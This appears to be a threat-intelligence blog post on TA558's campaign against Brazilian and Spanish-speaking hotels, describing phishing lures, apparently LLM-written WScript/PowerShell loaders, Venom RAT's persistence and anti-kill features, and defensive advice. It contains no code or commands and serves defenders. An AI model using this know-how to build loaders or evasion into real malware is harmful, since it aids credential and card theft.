top of page
Buscar

RAT Venom in Brazilian Hotels

  • Foto del escritor: Javier Conejo del Cerro
    Javier Conejo del Cerro
  • 18 sept
  • 3 Min. de lectura
ree

The hospitality sector in Latin America has become the latest battlefield for TA558, a threat actor long linked to RevengeHotels. In its newest campaign, the group combined phishing emails in Portuguese and Spanish with LLM-generated scripts to deploy Venom RAT, a Quasar-based malware sold in the cybercriminal market for $650 as a lifetime license. This marks a dangerous evolution: hotels and travel organizations are now facing attackers who blend human-crafted lures with AI-generated code to steal credit card data and business-sensitive information.


Phase 1: Phishing Lures at Reception 


The first wave of the campaign began with emails in Portuguese and Spanish disguised as invoices, job applications, or reservation details. These lures targeted front desk, reservation, and finance staff, who frequently handle billing or customer data. By tailoring the content to the hospitality environment, attackers increased the chance that employees would open the message and launch the malicious attachment.


Phase 2: LLM-Crafted Loaders 


Instead of traditional Office macros, TA558 used JavaScript loaders launched via WScript, heavily commented and formatted in ways consistent with large language model (LLM)-generated code. These scripts downloaded a PowerShell component, which in turn fetched a second-stage file named cargajecerrr.txt. Once executed, it pulled and ran the loader responsible for deploying the main payload. This AI-aided scripting allowed attackers to scale, automate, and refine their initial infection chain faster than before.


Phase 3: Venom RAT Deployment 


The Venom RAT payload was then installed, inheriting its framework from Quasar RAT but with commercial enhancements. Venom RAT is marketed for $650 as a lifetime license, reflecting its popularity in underground forums. Its features included:

  • Persistence through registry keys and re-launch routines.

  • Anti-kill mechanisms: modifying DACLs to prevent termination and killing analysis or admin tools every 50ms.

  • Security tampering: disabling Microsoft Defender and manipulating the Task Scheduler.

  • Spread: propagation via USB drives to reach more hosts.

  • Critical process flagging: if run with admin rights, it could mark itself as a critical system process to survive termination attempts.

This made Venom RAT a resilient tool to steal credentials, sessions, configuration files, and exfiltrate sensitive hotel data.


Phase 4: Harvesting Guests’ Secrets 


The group’s ultimate goal was clear: steal credit card data and customer records. By breaching hotel systems tied to Online Travel Agencies (OTAs) such as Booking.com, TA558 was able to capture payment card information from both guests and business partners. Beyond financial data, Venom RAT also harvested staff credentials, system configurations, and sensitive files — everything useful for fraud, resale, or lateral movement inside the compromised networks.


Phase 5: Persistence and Anti-Detection 


Venom RAT maintained its foothold with Registry modifications, USB spread, and continuous anti-analysis loops. It could also disable Microsoft Defender Antivirus, ensuring long-term presence. Its ability to exfiltrate data silently while keeping systems operational made detection harder, particularly for understaffed IT teams in hotels. The use of LLM-generated scripts added another challenge: the code looked generic, filled with comments, and lacked typical malware signatures.


The Antidote 


The RevengeHotels/TA558 campaign highlights how quickly cybercrime is evolving with AI-enhanced malware chains. Hospitality organizations should:


  • Filter and sandbox emails with reservation/invoice/job themes.

  • Audit and restrict PowerShell and WScript execution.

  • Monitor for LLM-like scripting patterns with excessive comments or boilerplate structures.

  • Deploy EDR solutions capable of detecting process tampering and anti-kill loops.

  • Limit admin privileges and enforce least privilege policies.

  • Train staff regularly to recognize phishing attempts in Portuguese and Spanish.


The Venom RAT campaign against Brazilian and Spanish-speaking hotels shows how traditional phishing lures are now supercharged by AI-generated scripts, expanding both scale and sophistication. By targeting financial and reservation systems linked to OTAs, TA558 and RevengeHotels highlight the fragility of hospitality supply chains. This incident is a stark reminder that even sectors focused on customer experience must now operate as frontline defenders against advanced cybercrime, where AI is no longer an advantage for the good side alone.



 
 
 

Comentarios

bottom of page